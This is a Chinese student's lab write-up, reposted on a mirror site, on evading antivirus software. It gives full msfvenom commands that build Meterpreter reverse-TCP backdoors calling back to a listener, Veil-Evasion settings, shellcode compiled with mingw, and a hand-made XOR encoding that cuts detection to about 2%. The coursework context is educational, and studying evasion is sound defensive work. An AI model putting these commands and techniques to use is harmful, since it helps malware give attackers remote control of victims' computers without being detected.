码迷,mamicode.com
首页 > 其他好文 > 详细

20155320 Exp3 免杀原理与实践

时间:2018-04-09 14:51:46      阅读:168      评论:0      收藏:0      [点我收藏+]

标签:g++   eve   ali   有趣   kali   决定   原理   监听   手工   

20155320 Exp3 免杀原理与实践

  • 免杀

    一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。

【基础问题回答】

  • (1)杀软是如何检测出恶意代码的?

    1.通过行为检测

    2.通过特征码的比对

    3.启发式检测

  • (2)免杀是做什么?

    是对恶意软件做处理,用来躲避杀毒软件的检查

  • (3)免杀的基本方法有哪些?

    方法有修改特征码

    改变行为特征

【正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧】

在老师提供的virscan上上传后门进行免杀测试。

1.全裸后门测试

  • 将未经处理过的后门直接在virscan上测试,发现裸奔的后门有18个杀软检测到了。

技术分享图片

技术分享图片

技术分享图片

2.利用msfvenom对裸奔的后门进行编码处理

  • 对全裸的后门用如下命令,进行一次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -b ‘\x00’ LHOST=192.168.19.128 LPORT=5320 -f exe > 5320-v1.exe

技术分享图片

  • 然后将经过编码后的后门程序后门程序在virscan上进行免杀测试,发现有19个杀软检测到了它,并没有起到隐藏作用。

技术分享图片

  • 然后我不死心又尝试了10次编码,只用把命令中i后面的数字改一下,就能控制编码次数了。

技术分享图片

  • 然而对于杀软来说穿上10件衣服的它和裸奔的它并没有什么区别,他依然没能逃过杀软的眼睛。

技术分享图片

3.Veil-Evasion免杀平台

  • 由于用的是老师的虚拟机,所以Veil已经安装好了,直接输入veil进入免杀平台,之后依次输入以下命令来进行选择
use evasion
use python/meterpreter/rev_tcp.py
set LHOST 192.168.19.133(kali IP)
set LPORT 5320

技术分享图片

  • 设定完成后,输入generate出现了错误,很难受,文件生成不了
    技术分享图片

  • 之后我看了一下有很多同学出现了同样的错误,发现将语言换成C语言即可了。

技术分享图片

  • 将产生的后门复制到windows下,加入杀软的信任列表里,进行检测,发现这次隐藏得不错,只有9个杀软检测到了。

技术分享图片

  • 通过回连(方法见上一次实验),成功监听

技术分享图片

4.利用shellcode编程实现免杀

  • 利用msf命令生成一个C语言的shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.128.19.133 LPORT=5320 -f c

技术分享图片

  • 将上图中生成的数组加上一个主函数建立一个met_5320.c的.c文件
  • 随后用命令i686-w64-mingw32-g++ met_5320.c -o met_5320.exe将.c文件转换为可执行文件met_5320.exe。

技术分享图片

  • 可以将可执行文件复制到windows下可以检测一下它的隐蔽性,然而一复制就被我的电脑管家拦截了,授予信任后检测发现仍然有9个杀软检测到了它。

技术分享图片

  • 回连但是exe文件运行有问题,很难受。

通过C语言调用Shellcode

  • 将shellcode拷到windows下,按老师的方法编写成.C文件通过VS编译运行得到的exe,可以回连到kali,报毒率也还可以,但是并没有低多少TAT。

技术分享图片

技术分享图片

手工版后门

  • 怎么能使报毒率变得更低呢,总的来说就是要将shellcode通过某种方式给藏起来,但是又能还原,发现大家的方法都五花八门的,我最终决定结合密码学的方法,将shellcode数组与1异或一下,主要是觉得应该隐藏效果不错而且简单。数组变化的代码如下。

技术分享图片

  • 变化后的数组如下,而且我检测了一下再异或一下是能变回去的,而且目测还是变得挺面目全非的,放心啦~。

技术分享图片

  • 将变化后的shellcode放入原C文件中,稍加变化(由于不让放代码,就不贴了),能回连成功,报毒率也相当低,只有2%了,开心,一直在报毒的瑞星也没发现,哈哈哈,用我的电脑管家查杀也很平静,感觉电脑管家保护不了我的电脑了。

技术分享图片

技术分享图片

【实验总结】

这次实验感觉相较有趣,技术性变强了,尤其是需要自己家手工制作后门实现免杀,感觉很有成就感,就是自己做后门的通用性不强,唉。还有就是发现瑞星很强呀,考虑之后换个杀软就换它了。

20155320 Exp3 免杀原理与实践

标签:g++   eve   ali   有趣   kali   决定   原理   监听   手工   

原文地址:https://www.cnblogs.com/ljq1997/p/8759083.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!